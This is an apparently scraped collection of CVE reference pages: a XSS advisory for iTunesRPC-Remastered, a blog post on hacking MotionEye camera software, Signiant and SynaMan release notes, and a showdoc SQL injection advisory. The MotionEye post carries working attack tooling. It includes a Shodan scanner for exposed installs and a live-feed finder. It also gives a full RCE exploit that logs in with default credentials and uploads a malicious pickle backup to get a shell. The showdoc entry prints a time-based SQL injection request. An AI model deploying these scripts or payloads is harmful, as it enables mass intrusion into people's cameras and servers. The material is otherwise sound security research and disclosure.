iTunesRPC-Remastered is a discord rich presence application for use with iTunes & Apple Music. In code before commit 24f43aa user input is not properly sanitized and code injection is possible. Users are advised to upgrade as soon as is possible. There are no known workarounds for this issue.

**Package**

server.py (Flask)

**Affected versions**

\>private.debug.3

**Impact**

_What kind of vulnerability is it? Who is impacted?_  
This vulnerability is a XSS and Improper Encoding vulnerability. AFAIK, only servers are impacted.

**Patches**

_Has the problem been patched? What versions should users upgrade to?_  
_No patches have been released yet._  
As of commit 24f43aa, the issue **has** been fixed. No official releases are affected. Commits 7f9dd66, b39ad02, 96cc9f2, 4d0f88b, c29b3c8, 953fd83, 355a474, and 54b02d9 are all still vulnerable.

**Workarounds**

_Is there a way for users to fix or remediate the vulnerability without upgrading?_  
Users can manually add escaping to the server and client, or upgrade to commit 24f43aa.

**For more information**

If you have any questions or comments about this advisory:

*   Email us at report.app.vulnerability@bildsben.tech

**CWEs**

**CVSS Score**

9.9 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L

CVE-2022-23603: Build software better, together

Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server.

**Getting Started with MotionEye**

MotionEye is an open source, web-based GUI for the popular Motion CLI application found on Linux. I’ve known of the Motion command line app for years, but I didn’t know that MotionEye existed. I ran across it while trying to find a multiple webcam, GUI or web based solution for future projects.

MotionEye comes in a couple forms – a standalone app, which I used the docker container version of, or a “whole” operating system, MotionEyeOS, to install on a Raspberry Pi.

Starting off, I used Shodan search to find internet facing installations. Here is the script I used for that. If you use this script, you’ll need to put in your API key and the limit parameter, which limits the API queries that you use.

    #!/usr/bin/env python3
    
    import sys
    # pip3 install shodan
    from shodan import Shodan
    import requests
    
    # check for api key
    api = Shodan('') # Insert API key here
    
    if api.api_key == '':
        print("No API key found! Exiting")
        sys.exit(1)
    
    limit = 1000 # set this to limit your api query usage
    counter = 0
    
    url_file = open("urls.txt", "w")
    
    for response in api.search_cursor('Server: motionEye'):
        ip = response['ip_str']
        port = response['port']
        url = f'http://{ip}:{port}'
        url_file.write(url + '\n')
    
        # Keep track of how many results have been downloaded so we don't use up all our query credits
        counter += 1
        if counter >= limit:
            break
    
    url_file.close()

I ran out of query credits when I ran this script. There are thousands of installations out there. This script will output the IP addresses of those installations.

**Finding Live Feeds**

In my review of the application, I found that you can make a query to the _/picture/{camera-number}/current/_ endpoint, and if it returns a 200 status code, it means that the feed is open to the public. You can also increment the camera-number an enumerate the numbers of cameras a feed will actually have, even if it isn’t available to view.

I took the output of motioneye-shodan.py script above, and fed it to live-feeds.py script below.

    #!/usr/bin/env python3
    
    import requests
    
    url_file = open("urls.txt", "r")
    urls = url_file.readlines()
    url_file.close()
    
    live_urls = open("live-urls.txt", "w")
    
    for url in urls:
        try:
            response = requests.get(url + "/picture/0/current/", verify=False, timeout=3).status_code
            print(response)
            if response == 200:
                live_urls.write(url)
        except:
            pass
    
    live_urls.close()

This script outputs the URL of camera feeds that we can view. But the real question here is, what security issues are there with MotionEye?

**Information Leakage**

It turns out that if you make a get request to the following endpoint _/config/list_, some of the feeds will return their config files. Most of the time these config files are innocuous. I’m not sure why these are publicly accessible even if the feed is publicly accessible. Maybe it is used as an API endpoint of some sort. I need to dig into the code some more.

However, sometimes these config files contain some very sensitive information. Consider the following config with _email\_notifications\_smtp\_password_ and _email\_notifications\_addresses_ removed. These passwords are supposed to be for services that the public cannot access, but unfortunately people like to reuse passwords. Again, why is this file even readable?

![](https://www.pizzapower.me/blog/wp-content/uploads/2021/10/Screenshot-from-2021-10-09-07-41-22.png)

**Rate-Limiting and Default Credentials**

So, the default installation of MotionEye uses the username of admin and a blank password. Additionally, MotionEye does not seem to institute any sort of rate limiting on login attempts. This is a recipe for disaster.

**Authenticated RCE Method #1**

Once logged in, I found two simple methods of code execution. The first of which is a classic Python cPickle deserialization exploit.

In the configuration section of the application, there is an option to backup and restore the application configurations. It turns out that if you include a malicious tasks.pickle file in the config you are restoring with, it’ll be written to disk and will be loaded when the application is restarted automatically or manually.

You can simply download the current configuration to use it as a template. After downloading and extracting it, slide your malicious tasks.pickle file and tar.gz everything back up.

The final structure of my motioneye-config.tar.gz for the docker container is as follows:

├── camera-1.conf  
├── motion.conf  
├── motioneye.conf  
└── tasks.pickle

Alternatively, the final structure of my motioneye-config.tar.gz lon MotionEyeOS is the following:

├── adjtime  
├── camera-1.conf  
├── crontabs  
├── date.conf  
├── localtime -> /usr/share/zoneinfo/UTC  
├── motion.conf  
├── motioneye.conf  
├── ntp.conf  
├── os.conf  
├── proftpd.conf  
├── shadow  
├── shadow-  
├── smb.conf  
├── ssh  
│   ├── ssh\_host\_dsa\_key  
│   ├── ssh\_host\_dsa\_key.pub  
│   ├── ssh\_host\_ecdsa\_key  
│   ├── ssh\_host\_ecdsa\_key.pub  
│   ├── ssh\_host\_ed25519\_key  
│   ├── ssh\_host\_ed25519\_key.pub  
│   ├── ssh\_host\_rsa\_key  
│   └── ssh\_host\_rsa\_key.pub  
├── static\_ip.conf  
├── tasks.pickle  
├── version  
├── watch.conf  
└── wpa\_supplicant.conf

Pause here: You see, those are ssh keys. So you say why don’t we just try ssh? Go for it. You also may not even need a password, but some people have either secured ssh or disabled ssh on the actually raspberry pi, so it won’t work. A lot of these instances will have ssh turned off, and if it is running in docker, you probably won’t be able to download the ssh keys. Also, it is more fun to write scripts in Python.

Once the configuration is uploaded, wait for the app to reload, or, in unfortunate cases, wait for the app to be reloaded by mother nature or the victim. From what I can see, the docker application will not autoreboot. Here is a Python 3 script that will do all of this. Also, see the github repo, which may be more updated.

    #!/usr/bin/env python3
    
    import requests
    import argparse
    import os
    import pickle
    import hashlib
    import tarfile
    import time
    import string
    import random
    from requests_toolbelt import MultipartEncoder
    import json
    
    
    # proxies = {"http": "http://127.0.0.1:9090", "https": "http://127.0.0.1:9090"}
    proxies = {}
    
    
    def get_cli_args():
        parser = argparse.ArgumentParser(description="MotionEye Authenticated RCE Exploit")
        parser.add_argument(
            "--victim",
            help="Victim url in format ip:port, or just ip if port 80",
            required=True,
        )
        parser.add_argument("--attacker", help="ipaddress:port of attacker", required=True)
        parser.add_argument(
            "--username", help="username of web interface, default=admin", default="admin"
        )
        parser.add_argument(
            "--password", help="password of web interface, default=blank", default=""
        )
        args = parser.parse_args()
        return args
    
    
    def login(username, password, victim_url):
        session = requests.Session()
        useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
        headers = {"User-Agent": useragent}
        login_url = f"http://{victim_url}/login/"
        body = f"username={username}&password={password}"
        session.post(login_url, headers=headers, data=body)
        return session
    
    
    def download_config(username, victim_url, session):
        download_url = f"http://{victim_url}/config/backup/?_username={username}&_signature=5907c8158417212fbef26936d3e5d8a04178b46f"
        backup_file = session.get(download_url)
        open("motioneye-config.tar.gz", "wb").write(backup_file.content)
        return
    
    
    def create_pickle(ip_address, port):
        shellcode = ""  # put your shellcode here
    
        class EvilPickle(object):
            def __reduce__(self):
                cmd = shellcode
                return os.system, (cmd,)
    
        # need protocol=2 and fix_imports=True for python2 compatibility
        pickle_data = pickle.dumps(EvilPickle(), protocol=2, fix_imports=True)
        with open("tasks.pickle", "wb") as file:
            file.write(pickle_data)
            file.close()
        return
    
    
    def decompress_add_file_recompress():
        with tarfile.open("./motioneye-config.tar.gz") as original_backup:
            original_backup.extractall("./motioneye-config")
            original_backup.close()
        original_backup.close()
        os.remove("./motioneye-config.tar.gz")
        # move malicious tasks.pickle into the extracted directory and then tar and gz it back up
        os.rename("./tasks.pickle", "./motioneye-config/tasks.pickle")
        with tarfile.open("./motioneye-config.tar.gz", "w:gz") as config_tar:
            config_tar.add("./motioneye-config/", arcname=".")
        config_tar.close()
        return
    
    
    def restore_config(username, password, victim_url, session):
        # a lot of this is not necessary, but makes for good tradecraft
        # recreated 'normal' requests as closely as I could
        t = int(time.time() * 1000)
        path = f"/config/restore/?_={t}&_username={username}"
        # admin_hash is the sha1 hash of the admin's password, which is '' in the default case
        admin_hash = hashlib.sha1(password.encode("utf-8")).hexdigest().lower()
        signature = (
            hashlib.sha1(f"POST:{path}::{admin_hash}".encode("utf-8")).hexdigest().lower()
        )
        restore_url = f"http://{victim_url}/config/restore/?_={t}&_username=admin&_signature={signature}"
    
        # motioneye checks for "---" as a form boundary. Python Requests only prepends "--"
        # so we have to manually create this
        files = {
            "files": (
                "motioneye-config.tar.gz",
                open("motioneye-config.tar.gz", "rb"),
                "application/gzip",
            )
        }
    
        useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
        boundary = "----WebKitFormBoundary" + "".join(
            random.sample(string.ascii_letters + string.digits, 16)
        )
    
        m = MultipartEncoder(fields=files, boundary=boundary)
        headers = {
            "Content-Type": m.content_type,
            "User-Agent": useragent,
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": "meye_username=_; monitor_info_1=; motion_detected_1=false; capture_fps_1=5.6",
            "Origin": f"http://{victim_url}",
            "Referer": f"http://{victim_url}",
            "Accept-Language": "en-US,en;q=0.9",
        }
        response = session.post(restore_url, data=m, headers=headers, proxies=proxies)
        # if response == reboot false then we need reboot routine
        content = json.loads(response.content.decode("utf-8"))
    
        if content["reboot"] == True:
            print("Rebooting! Stand by for shell!")
        else:
            print("Manual reboot needed!")
        return
    
    
    if __name__ == "__main__":
        print("Running exploit!")
        arguments = get_cli_args()
        session = login(arguments.username, arguments.password, arguments.victim)
        download_config(arguments.username, arguments.victim, session)
        # sends attacker ip and port as arguments to create the pickle
        create_pickle(arguments.attacker.split(":")[0], arguments.attacker.split(":")[1])
        decompress_add_file_recompress()
        restore_config(arguments.username, arguments.password, arguments.victim, session)
    

**Authenticated RCE Method #2**

Another method of code execution involves motion detection. There is an option to run a system command whenever motion is detected. The security implications of this are obvious.

![](https://www.pizzapower.me/blog/wp-content/uploads/2021/10/rce-motioneye-1024x591.jpg)

python rev shell

**Conclusion**

While authentication is needed for RCE, the presence of default credentials and lack of rate limiting make obtaining authentication straightforward. There are a lot of people running this software in a vulnerable manner.

As per my usual advice, don’t expose MotionEye to the WWW. Like all the self-hosted solutions, I advise you to install this to face your internal network and then connect to your internal network via OpenVPN or Wireguard.

Update: As for MotionEye, I really like the app. I’m currently using it in production – with a robust password, haha.

CVE-2021-44255: Hacking MotionEye/MotionEyeOS | Pizza-Powered Hacking 🍕

Signiant Manager+Agents before 15.1 allows XML External Entity (XXE) attacks.

Updated December 13, 2021

**What's New in Manager+Agents 15.1**

This version of Manager+Agents includes usability improvements, bug fixes, and software architecture improvements resulting in better performance and improved security.

In this release:

*   **New Agent Picker**: A new Agent picker has been added to Media Mover jobs, Agent reports, Agent upgrades, and Manager backups to Agents, allowing you to easily select multiple Agents at a time.
    
*   **Object Mover Jobs**: ObjectDropBox and ObjectUploader job templates now support the ability to move source data after a transfer completes.
    
*   **Job Retrying**: Object Mover jobs that fail due to lack of available system resources are now retried on the next available Agent.
    
*   **Job Creation** Object Mover and Media Mover templates now have conditional prompting to make job creation easier.
    
*   **Field Notes**: You can now add Field Notes to Agent, Boolean, and PickList prompts on custom job templates.
    
*   **REST API Improvements**: The REST API now allows you to set job labels.
    
*   **REST API Documentation**: The native REST API documentation has been updated to provide better and more complete examples.
    
*   **Agent List Improvements**: In the Agent List, you can now choose to stop monitoring unreachable Agents.
    
*   **Agent Operating System Changes**: Added support for Ubuntu 20.04 LTS Agents.
    
*   **Agent Hardware Changes**: Added support for Apple M1 CPUs on macOS Agents.
    
*   **Manager and Agent Operating System Changes**: Added support for Rocky Linux 8.4.
    
*   **Active Filename**: Jobs now display the **Active Filename** of the file currently being transferred.
    
*   **Active Filename**: Job and Agent queues in resource controls can now display an **Active Filename** column to show which file is currently being transferred.
    
*   **Job Queueing**: Job queuing management has been improved to allow you to easily reorder jobs in the job queue.
    
*   **File Metadata**: Jobs now have the option to preserve the original file creation date after being transferred to a destination.
    
*   **File Suffix**: Jobs now have the option to add a suffix to new versions of files that have been previously transferred with the same name.
    
*   **Workflow Gateway**: Workflow Gateway has been improved to allow file filtering based on the source file date.
    
*   **Health Checks**: System health checks have been improved to include more information and details.
    

**Bug Fixes**

*   Fixed issues in the Windows installer related to the progress bar, installation summary, and uninstall process.
    
*   Fixed an issue where the **Data Transferred** incorrectly displayed the **Total Data** value.
    
*   Fixed an issue where the Agent version would not update on the Agent List after upgrading the Agent.
    
*   Fixed an issue in job views and reports related to date preferences not being preserved.
    
*   Fixed an issue with Media Mover related to the **Skip Source File Not Found On Send** prompt causing jobs to fail.
    
*   Fixed an issue that did not release TCP connections from Agents using version 14.0 or earlier when using Agent monitoring.
    
*   Fixed an issue where Windows Manager backups would not check for free disk space before trying to restore the system.
    
*   Fixed an issue where the job status would not show the correct status when a Windows backup failed.
    
*   Fixed an issue that prevented Workflow Gateway from working after restoring a Windows backup.
    
*   Security improvements to prevent potential XML External Entity and Cross Domain attacks.
    
    **Note**: The security improvements are available to all supported versions of the Manager software. If you are using version 14.1 or higher, it is recommended you download and install the latest bundle to ensure your system is secure. If you are using an earlier version, contact Signiant Customer Support for assistance migrating to a newer version.
    

**Perl Upgrade**

New installations of Manager+Agents version 15.1 include Perl version 5.32.1 to improve performance and security. Existing Manager+Agents deployments upgrading to version 15.1 will remain on the same version of Perl and can be manually updated. For more information see Upgrading Perl Versions in Manager+Agents 15.1.

**Upgrade Path**

This upgrade can be installed on Manager+Agents 13.1 or higher. Previous versions must upgrade to 13.1 before upgrading to this version. Contact Signiant Customer Support for more information.

**Agent Configurations**

Upgrading Manager+Agents does not preserve additional Agent configuration files other than `sigsetup.inf`. To save your additional configuration files, back up all INF files contained within the Agent `hosts` directory.

*   Linux: `usr/signiant/dds/3rdparty/jboss/server/default/deploy/signiant.war/secure/hosts/`
    
*   Windows: `C:\Program Files\Signiant\Mobilize\3rdparty\jboss\server\default\deploy\signiant.war\secure\hosts\`
    

**End of Life Announcements**

Manager+Agents 15.1 includes changes to the supported operating systems and deployment options. For more information, contact Signiant Customer Support.

**End of Agent Support for Debian Linux 8 / Ubuntu Linux 17**

Agent software no longer supports Debian Linux 8 and Ubuntu Linux 17. To upgrade to the latest version of Manager+Agents, you must upgrade any Debian or Ubuntu Linux Agents to a supported operating system.

**End of Agent Support for Apple macOS 10.13 and earlier**

Agent software no longer supports Apple macOS 10.13 (High Sierra) or earlier. To upgrade to the latest version of Manager+Agents, you must upgrade any macOS agents to version 10.14 (Mojave) or higher.

**End of Life Reminders**

The following Manager+Agents solutions are no longer supported and may require assistance from Signiant Customer Support to upgrade to a newer version of Manager+Agents.

**Manager+Agents supported Media Shuttle portals**

Manager+Agents backed Media Shuttle deployments are no longer supported. For more information, contact Signiant Customer Support for assistance migrating your Media Shuttle deployment to the cloud native Signiant Media Shuttle, which provides additional features and functionality to Media Shuttle.

**Manager+Agents supported Media Exchange**

Media Exchange deployments are not supported by Manager+Agents 15.0 or higher. To continue using Media Exchange, remain at Manager+Agents 14.1 or earlier.

**Web Transfer API**

**Web Transfer API** is not supported by Manager+Agents 15.0 or higher. To continue using Agents as TAPI-enabled servers, remain at Manager+Agents 14.1 or earlier.

CVE-2021-46660: Release Notes for Manager+Agents | Signiant Help

An insecure direct object reference for the file-download URL in Synametrics SynaMan before 5.0 allows a remote attacker to access unshared files via a modified base64-encoded filename string.

This page lists all public releases of SynaMan. It does not list every nightly build and therefore, you will see gaps in the build numbers.

**Version 5.0****Build 1589 - January 03, 2022**

*   Ability to enable ciphers recommended by FIPS 140-2 guidelines. Details...
*   Ability to block user id besides IP address when incorrect passwords are specified.
*   X-Forwarded-For header is honored when SynaMan runs behind a reverse proxy server
*   **Security Fix** - Files affecting CVE-2019-17571 and CVE-2021-4104 are removed from SynaMan. Although these files were present in the older builds, they were not used. Out of an abundance of caution, this build completely removes them.
*   **Security Fix** - URLs for public link downloads can be modified with guessed files names to download unauthorized files.
*   **Security Fix** - A user can potentially create a public link with Javascripts in comments field, which could launch XSS attack in recipient's email client.

**Version 4.9****Build 1580 - September 23, 2021**

*   Bug Fix: Files in the recycling bin are saved even when disabled.

**Build 1579 - September 07, 2021**

*   Recycle Bin has been added. Details...
*   Ability to download uploaded files through the notification email message.
*   Ability to upload multiple files from mobile devices, such as iPhone/Android.
*   File Explorer's height gets adjusted on large screen.
*   Enhanced restarting.
*   Ability to modify existing folders, rather than creating new folders
*   Ability to patch a custom version using the web interface.
*   Security Update: JQuery version has been updated to mitigate risks mentioned on CVE-2015-9251, CVE-2015-11358, CVE-2020-11022, CVE-2020-11023
*   Security Update: Ability to force TLS 1.2
*   Security Update: Restore password URL uses AES encryption for authentication token for enhanced entropy.
*   New icons have been added to Manager User and Folder screen to indicate encryption and recycle bin.
*   Bug Fix: Mobile interface ignores delete and zip/unzip permissions
*   Bug Fix: Audit and Access logs are not created when connecting from mobile devices
*   Bug Fix: Current activity is not updated when using Login URL from a mobile device

**Version 4.8****Build 1567 - April 19, 2021**

*   At-rest encryption has been added. Details...
*   Ability to force new users to change their password upon first login
*   Ability to automatically connect to broken mounted drives.
*   Ability to contact support from the web interface
*   Bug Fix: Unable to download folders containing % sign.
*   Bug Fix: Default quota is not set when creating users from LDAP or invitation.

**Version 4.7****Build 1557 - August 24, 2020**

*   Access Logs. Details...
*   Mapped Drives across the Internet from any desktop machine. Details...
*   Ability to view and remove blacklisted IP address from **Configuration/Security** screen.
*   Bug Fix: Certain special characters were not allowed in password.

**Version 4.6****Build 1548 - June 23, 2020**

*   Granular permissions. Details...
*   Ability to upload multiple files when CSRF is enabled
*   User Management screen has been enhanced to accomodate for additional security permissions

**Version 4.5****Build 1544 - April 14, 2020**

*   Ability to Search Files. Details...
*   Ability to reset forgot passwords, rather than sending the password via email, which was not secure.
*   Security Fix: A vulnerability (CVE-2019-8331) was fixed.

**Version 4.4****Build 1533 - February 11, 2020**

*   Bug Fix: Uploads fail unless you explicity select an action for Harmful Extensions
*   Bug Fix: User validation from Active Directory fails occasionally.
*   Bug Fix: The Auto Update configuration toggles itself when the page is saved.

**Build 1532 - February 10, 2020**

*   Ability to prevent/rename potentially malicious files. Details...
*   Ability to use LDAP servers other than MS Exchange
*   Security Fix: HTTP redirection is forced after adding a new user, prevent someone from hitting the back button to reveal passwords.
*   Security Fix: Password policy rules are enforce even when administrators create new account

**Version 4.3****Build 1525 - August 28, 2019**

*   Ability to deny connections from Tor Nodes. Details...
*   Email notifications for public links are now in HTML
*   Confirmation dialog after creating a public link has been enhanced
*   Ability to prompt for end-user information before they upload/download files using public links. Details...
*   Ability to automatically block IP addresses that appear to send malicious requests
*   Security Fix: CSRF attacks were possible when uploading files.
*   Bug Fix: A 404 error is generated when using a DNS server for Let's Encrypt challenge
*   Bug Fix: Let's Encrypt certificate cannot be renewed automatically if using a different HTTP server for challenge

**Version 4.2****Build 1517 - April 29, 2019**

*   Ability to integrate with Let's Encrypt to create FREE SSL certificate. Details...
*   Ability to check-in/out files (Enterprise Edition) Details...
*   Web server has been updated
*   Ability to make passwords mandatory for public links.
*   Security Fix: XSS attack against SynaMan is possible through user's invitation screen.

**Version 4.1****Build 1506 - Feb 18, 2019**

*   Security Fix: Ability to call JSP files directly is disabled
*   Bug Fix: Emails are sent out using the admin account when public links are created.
*   Bug Fix: File names containing non-English characters are occasionally corrupted when using MS Edge.
*   Bug Fix: Total branding adds a question mark in the begining of the page

**Build 1500 - Sept 26, 2018**

*   Ability to route emails via Synametrics WebSMTP service if communication to your SMTP server fails. Details ...

**Build 1498 - August 15, 2018**

*   Bug Fix: Files larger than 2.1GB occasionally gets truncated when using the AJAX browser

**Build 1496 - July 26, 2018**

*   Bug Fix: Enhanced Browser gets stuck while fetching directory contents

**Build 1495 - July 25, 2018**

*   Ability to mount SMB shares (remote drives on Windows). Click here for details.
*   Bug Fix: Quote screen cannot be saved when CSRF is enabled
*   Bug Fix: Smtp password is stored in clear in AppConfig.xml

**Version 4.0****Build 1488 - December 06, 2017**

*   Completely redesigned user interface
*   Two-Factor Authentication (Enterprise Edition)
*   Quota for home folder (Enterprise Edition)

**Version 3.9****Build 1474 - November 21, 2016***   **Bug Fix:** Filenames containing foreign characters get corrupted when uploading using AJAX Browser
*   **Enhancement:** Two new fields are added in email notifications for public links. These fields includes the recipients name and email.
**Build 1472 - October 28, 2016**

*   **Bug Fix:** Empty folders are not uploaded when using Enhanced Browser
*   **Enhancement:** The downloaded JNLP file for Enhanced Browser can now optionally remember user credentials.

**Build 1469 - September 15, 2016**

*   **Bug Fix:** The upload button is not visible when trying to upload files using a Public Link and browser is IE

**Build 1468 - September 06, 2016**

*   Ability to upload files larger than 2.1 GB using the Ajax Browser
*   Integration with Xeams. Click here for details.

**Version 3.8****Build 1466 - August 01, 2016**

*   Significant changes have been made in Embedded SMTP Server.
    *   Ability to listen on two other ports besides primary. For example, you can make the embedded SMTP server listen on port 25, 587 as well as 465 (SSL)
    *   Ability disallow SMTP Authentication on port SMTP but not secondary
*   Ability to delegate SMTP authentication for embedded SMTP server. Click here for more information.

**Version 3.7****Build 1463 - May 20, 2016**

*   Public links can be created without specifying an email. In such cases, the link will be displayed on the following message without generating any email.
*   Bug Fix: The **File Preview** feature does not work when there is a space in the file name

**Build 1461 - March 07, 2016**

*   Enhancement: Automatically create new users by sending email invitations. More info...
*   Enhancement: The Enhanced Browser is no longer a Java Applet. More info...

**Version 3.6****Build 1456 - October 02, 2015**

*   Bug Fix: Fixes a bug related to SSL certificate in Enhanced Browser
*   Enhancement: The location of tmpZipDir can now be changed through server.properties file. This location is used by SynaMan to create a zipped file when multiple files or folders are downloaded by the user.
*   Bug Fix: A trailing space in user's email or shared folder name results in an error.
*   Bug Fix: An & sign in shared folder name creates problem in Enhanced Browser

**Build 1452 - June 29, 2015**

*   New Feature: Template user - new users will inherit shared folder from this user.
*   Bug Fix: A trailing space in either user name or shared folder name can result in errors.

**Version 3.5****Build 1451 - April 16, 2015**

*   New Feature: Ability to upload files using drag-n-drop when using Ajax Browser or public link. Supported browsers for this feature are Firefox, Google Chrome and Apple Safari. Click here for details.
*   New Feature: Ability to upload more than one file at a time.
*   New Feature: Ability to add a comment when uploading files using public link. Click here
*   Security Fix: CSRF attacks are detected and prevented. Click here for details.

**Version 3.4****Build 1444 - October 27, 2014**

*   Security update: Disables SSLv3, which prevents the newly discovered POODLE attack.

**Build 1434 - March 04, 2014**

*   Ability to upload files from a mobile device
*   UPnP support for easily configuring firewalls.
*   Troubleshooting wizard to easily identify connection problems.

**Version 3.3****Build 1430 - January 16, 2014**

*   Manifest problem fixed with the applet for Enhanced browser
*   The embedded SMTP server can now handle attachments encoded with printed-quotable.
*   Ability to rename files when public files are uploaded with same names

**Build 1425 - December. 08, 2013**

*   Support for STARTTLS in embedded SMTP
*   Bug fix: uploading files with unicode characters in their name does not work when using the AJAX browser.
*   Embedded SMTP can be configured to add the download link either at attachment or part of existing HTML body

**Build 1418 - June. 04, 2013**

*   Triggers - ability to launch custom scripts/executables when files are transferred.
*   CLI - Command line interface allow uploading/downloading files to a machine where SynaMan is running, allowing users to script file transfers.
*   Global notifications
*   Enhanced embedded SMTP server
*   Interface enahancments

**Version 3.2****Build 1398 - Nov. 09, 2012**

*   Public links can be protected by a password
*   Bug fix: Public link notification email does not work when users are authenticated using Active Directory.

**Build 1394 - Oct. 22, 2012**

*   Cache problem with iPhone/iPad is fixed. iOS tends to cache pages, causing users to see stale data.

**Build 1393 - Oct. 08, 2012**

*   Ability to assign free style note to any file
*   Ability to notify user when someone downloads/uploads file using public links

**Version 3.1****Build 1386 - Aug. 27, 2012**

*   Handing of Tricky path alerts is enhanced.

**Build 1384 - July 17, 2012**

*   Bug Fix: The web interface does not save user's email address under certain conditions.

**Build 1382 - June 28, 2012**

*   Bug Fix: Notification emails are not sent for uploads unless downloads notifications are also enabled.

**Build 1380 - June 26, 2012**

*   Integration with Microsoft Active Directory
*   Ability to access SynaMan from iPhone, Android, Windows Phone and other mobile devices
*   User home folder

**Version 3.0****Build 1365 - May 11, 2012**

*   Bug fix: On rare occasions, the Embedded SMTP server does not send emails when multiple recipients are specified

**Build 1363 - March. 23, 2012**

*   Ability to download folders via public link

**Build 1358 - Feb. 09, 2012**

*   Enhanced browser - allowing users to upload/download multiple files, complete partially transfered files and Quick edit

**Version 2.7****Build 1342 - Nov. 09, 2011**

*   Bug fix: Access to public folder is broken.

**Build 1341 - Nov. 08, 2011**

*   Ability to display menu without right clicking, useful when connecting to SynaMan interface from Android devices.
*   Bug fix: Foreign characters are not displayed correctly when download and upload template files are modified.

**Build 1337 - May. 31, 2011**

*   Embedded SMTP server.
*   Total branding
*   Ability to force HTTPS if available
*   Branding using the web interface
*   Ability to use an SSL certificate from IIS server

**Version 2.6****Build 1328 - May. 05, 2011**

*   Ability to abort an upload.
*   File filter in the Explorer window. Users can specify a wild card like \*.txt to limit files ending with .txt. Multiple filters can be separated by a | symbol. For example, \*.gif|\*.jpg

**Version 2.5****Build 1325 - Apr. 20, 2011**

*   Weaker SSL ciphers are now disabled by default, forcing clients to use 128 bit encryption..

**Build 1324 - Apr. 08, 2011**

*   Remote file explorer is now compatible with IE 9.

**Build 1322 - Mar. 08, 2011**

*   Bug Fix: Zipped file cannot be created for multiple downloads if the shared folder does not have write access.

**Build 1321 - Sep. 15, 2010**

*   Bug Fix: A security related bug is fixed.

**Build 1318 - Sep. 01, 2010**

*   Bug Fix: The HTTP server accepts multiple Content-Length headers in request, which can be misused by a malicious user.

**Build 1316 - July 14, 2010**

*   Bug Fix: Ampersands in file names are not handled correctly when files are being downloaded.

**Build 1314 - June 17, 2010**

*   Users can change their password through the web interface.
*   Existing file name is displayed as default when renaming files.  
    

**Build 1313 - May 27, 2010**

*   Bug Fix: Public links are not created correctly when using IPv6 and connecting from localhost
*   Bug Fix: Sometimes users can delete files from a read-only folder  
    

**Build 1310 - May 12, 2010**

*   Public links for HTTPS can now be created.
*   Admin's home page displays current activity
*   Admin's home page displays disk status for the shared folder rather than the installation drive.

**Build 1304 - Apr 30, 2010**

*   Bug Fix: More than one public folder were not getting displayed through the explorer interface.

**Build 1303 - Apr 14, 2010**

*   TLS and SSL are now supported when sending out-bound emails.

**Build 1302 - Apr 01, 2010**

*   Login IDs are now case-insensitive.
*   Ability to integrate with Apache mod\_proxy

**Build 1291 - Feb 12, 2010**

*   Ability to specify a character sets for non-English users. Click here for more information

**Build 1289 - Feb 03, 2010**

*   Bug fix: When modifying data for existing users, users can mistakenly add one user twice.
*   Bug fix: Login form now uses HTTP POST rather than GET

**Build 1282 - Jan 25, 2010**

*   Download multiple files together
*   Discovery host is used for public links  
    

**Version 2.4****Build 1272 - Jan 09, 2010**

*   Preview - views files on a host machine without downloading them
*   Manage existing public links
*   The actual hyper link is displayed on the screen after you create a new public link  
    

**Version 2.3****Build 1261 - Dec. 22, 2009**

*   Bug fix - Public link for upload expires prematurely for empty folders.

**Build 1259 - Dec. 18, 2009**

*   Public folders - automatically adds folders to every user  
    
*   Custom branding for your company.
*   Ability to remove a folder from user's account. Earlier versions used to mark the folder for no access. Now you can completely remove an unwanted folder.  
    

**Version 2.2****Build 1246 - Nov.. 20, 2009**

*   Bug fix - deleting a user does not persist. User appears after reboot.
*   Bug fix - multiple public link do not work in the same HTTP session  
    

**Build 1205 - Oct. 15, 2009**

*   File upload/download notifications sent via email  
    
*   Ability to add public links  
    
*   Security alerts via email  
    
*   Remote cut/copy/paste operations  
    
*   Troubleshooting utility added for dynamic IP address  
    

**Version 2.1****Build 1202 - Jul. 29, 2009**

*   Several enhancements to AJAX interface has been made.
*   File upload status window  
    
*   Audit trail logs  
    
*   Additional logging entries added
*   Discovery service added for dynamic IP address  
    

**Version 2.0****Build 1185 - Dec. 27, 2008**

*   Completely new interface using AJAX. Includes:  
    

*   Remote file manager
*   Remote browse

*   Storage occurs in XML format rather than plain property files
*   Users can now use SSH to connect to the web Interface  
    
*   Many-to-many relationships can be created between folders and users  
    
*   Enhanced logging capabilities added  
    

**Version 1.1****Build 972 - May 10, 2008**

*   Runs as a service on Windows machine
*   Start/stop scripts added for Linux  
    
*   Ability to restart SynaMan from the web interface  
    
*   Enhanced logging capabilities added  
    

**Version 1.0****Build 805 - Jul 19, 2007**

*   Updated to JRE to 1.5
*   Bug fix - uploading large files fails sometimes  
    

**Build 786 - Jun 15, 2007**

*   Ability to move up to parent folder added  
    
*   Ability to jump to a user defined folder

CVE-2022-22828: Version History for SynaMan

SQL Injection in Packagist showdoc/showdoc prior to 2.10.3.

**Description**

The `uid` parameter does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection.

**Proof of Concept**

Time based:

    POST /server/index.php?s=/api/adminUser/addUser HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept: application/json, text/plain, */*
    Cookie: PHPSESSID=c35a50119eee7d09650616215ccc2693; think_language=en-US; cookie_token=248df88efcc25f6b5aef3ad5cf4fd2c145be19155add1c78609427a37f88d267
    Accept-Encoding: gzip,deflate
    Content-Length: 106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
    Host: host.com
    Connection: Keep-alive
    
    name=laladee&uid=10'+and+1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))+and+'1'='1&username=laladee
    

**Impact**

A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write script to extract data

CVE-2022-0362: SQL Injection in showdoc

